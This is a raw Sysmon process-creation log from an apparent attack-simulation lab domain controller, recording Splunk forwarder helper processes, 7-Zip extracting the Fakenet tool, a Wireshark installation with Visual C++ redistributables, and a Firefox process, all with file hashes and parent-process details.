Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:20.254{A8622C2F-46B8-6078-D705-00000000AE01}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:18.473{A8622C2F-46B6-6078-D605-00000000AE01}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:17.883{A8622C2F-46B5-6078-D405-00000000AE01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:17.154{A8622C2F-46B5-6078-D305-00000000AE01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000027212Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:11.241{A8622C2F-46AF-6078-D205-00000000AE01}6248C:\Program Files\7-Zip\7zG.exe19.007-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Administrator\Downloads\Fakenet1.0c\" -spe -an -ai#7zMap6436:100:7zEvent29311C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=04FB3AE7F05C8BC333125972BA907398,SHA256=2FB898BACB587F2484C9C4AA6DA2729079D93D1F923A017BB84BEEF87BF74FEF,IMPHASH=9CF6F80DD6DFE9900700C1E11C318B2A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000026283Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:02.468{A8622C2F-46A6-6078-D005-00000000AE01}4672C:\Windows\Temp\{9566FD17-4228-44D3-8E7A-F53C5A390B29}\.be\VC_redist.x64.exe14.28.29910.0Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft CorporationVC_redist.x64.exe"C:\Windows\Temp\{9566FD17-4228-44D3-8E7A-F53C5A390B29}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9CF6F77D-BF9D-42EA-9A23-39332541F87E} {59E6ACF4-BF94-45EA-9947-D0C673B39B89} 4420C:\Program Files\Wireshark\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C27046BD35C5717084BB40C7305B941A,SHA256=E0BC82C13BCD1ADE084A0421DAB88E23E9CC5499323449E585E7DD2116951BD3,IMPHASH=1A5CDBF711FEE14B077E599D13FDDAB2{A8622C2F-46A5-6078-CF05-00000000AE01}4420C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe"C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Program Files\Wireshark\vcredist_x64.exe" -burn.filehandle.attached=580 -burn.filehandle.self=588 /install /quiet /norestart 154100x800000000000000026245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:01.750{A8622C2F-46A5-6078-CF05-00000000AE01}4420C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe14.28.29910.0Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft CorporationVC_redist.x64.exe"C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Program Files\Wireshark\vcredist_x64.exe" -burn.filehandle.attached=580 -burn.filehandle.self=588 /install /quiet /norestartC:\Program Files\Wireshark\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C27046BD35C5717084BB40C7305B941A,SHA256=E0BC82C13BCD1ADE084A0421DAB88E23E9CC5499323449E585E7DD2116951BD3,IMPHASH=1A5CDBF711FEE14B077E599D13FDDAB2{A8622C2F-46A5-6078-CE05-00000000AE01}3908C:\Program Files\Wireshark\vcredist_x64.exe"C:\Program Files\Wireshark\vcredist_x64.exe" /install /quiet /norestart 154100x800000000000000026235Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:01.245{A8622C2F-46A5-6078-CE05-00000000AE01}3908C:\Program Files\Wireshark\vcredist_x64.exe14.28.29910.0Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft CorporationVC_redist.x64.exe"C:\Program Files\Wireshark\vcredist_x64.exe" /install /quiet /norestartC:\Program Files\Wireshark\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D93387DF353336FA182BB57FBA94F4D3,SHA256=F299953673DE262FEFAD9DD19BFBE6A5725A03AE733BEBFEC856F1306F79C9F7,IMPHASH=1A5CDBF711FEE14B077E599D13FDDAB2{A8622C2F-4696-6078-CD05-00000000AE01}6368C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe"C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe" 154100x800000000000000026006Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:46.431{A8622C2F-4696-6078-CD05-00000000AE01}6368C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe3.4.4.0Wireshark installer for 64-bit WindowsWiresharkWireshark development team-"C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=81F52F160CEDFBE0AFDD5FE936AC0BE1,SHA256=568D5B3F7DCCA301D4F4069B72FD458CD6FB9562C4F06227CCB2A1804B260B26,IMPHASH=C05041E01F84E1CCCA9C4451F3B6A383{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000025859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:23.353{A8622C2F-467F-6078-CC05-00000000AE01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:21.971{A8622C2F-467D-6078-CB05-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025826Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:21.304{A8622C2F-467D-6078-CA05-00000000AE01}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025815Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:20.266{A8622C2F-467C-6078-C905-00000000AE01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025795Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:18.499{A8622C2F-467A-6078-C805-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:17.881{A8622C2F-4679-6078-C705-00000000AE01}5168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025775Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:17.147{A8622C2F-4679-6078-C605-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:23.349{A8622C2F-4643-6078-C405-00000000AE01}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:21.958{A8622C2F-4641-6078-C305-00000000AE01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:21.287{A8622C2F-4641-6078-C205-00000000AE01}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025312Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:20.255{A8622C2F-4640-6078-C105-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025300Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:18.693{A8622C2F-463E-6078-C005-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025284Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:18.021{A8622C2F-463E-6078-BF05-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025272Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:17.130{A8622C2F-463D-6078-BE05-00000000AE01}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025125Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:08.953{A8622C2F-4634-6078-BD05-00000000AE01}3916C:\Program Files\7-Zip\7zG.exe19.007-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\ADMINI~1\AppData\Local\Temp\" -an -ai#7zMap281:108:7zEvent19775C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=04FB3AE7F05C8BC333125972BA907398,SHA256=2FB898BACB587F2484C9C4AA6DA2729079D93D1F923A017BB84BEEF87BF74FEF,IMPHASH=9CF6F80DD6DFE9900700C1E11C318B2A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000024863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:23.335{A8622C2F-4607-6078-BC05-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:21.953{A8622C2F-4605-6078-BB05-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:21.287{A8622C2F-4605-6078-BA05-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024820Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:20.234{A8622C2F-4604-6078-B905-00000000AE01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024804Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:18.684{A8622C2F-4602-6078-B805-00000000AE01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024786Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:18.006{A8622C2F-4602-6078-B705-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024777Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:17.129{A8622C2F-4601-6078-B605-00000000AE01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:39.125{A8622C2F-45DB-6078-B505-00000000AE01}4520C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.34.670914474\847039290" -childID 5 -isForBrowser -prefsHandle 4424 -prefMapHandle 4788 -prefsLen 8227 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir 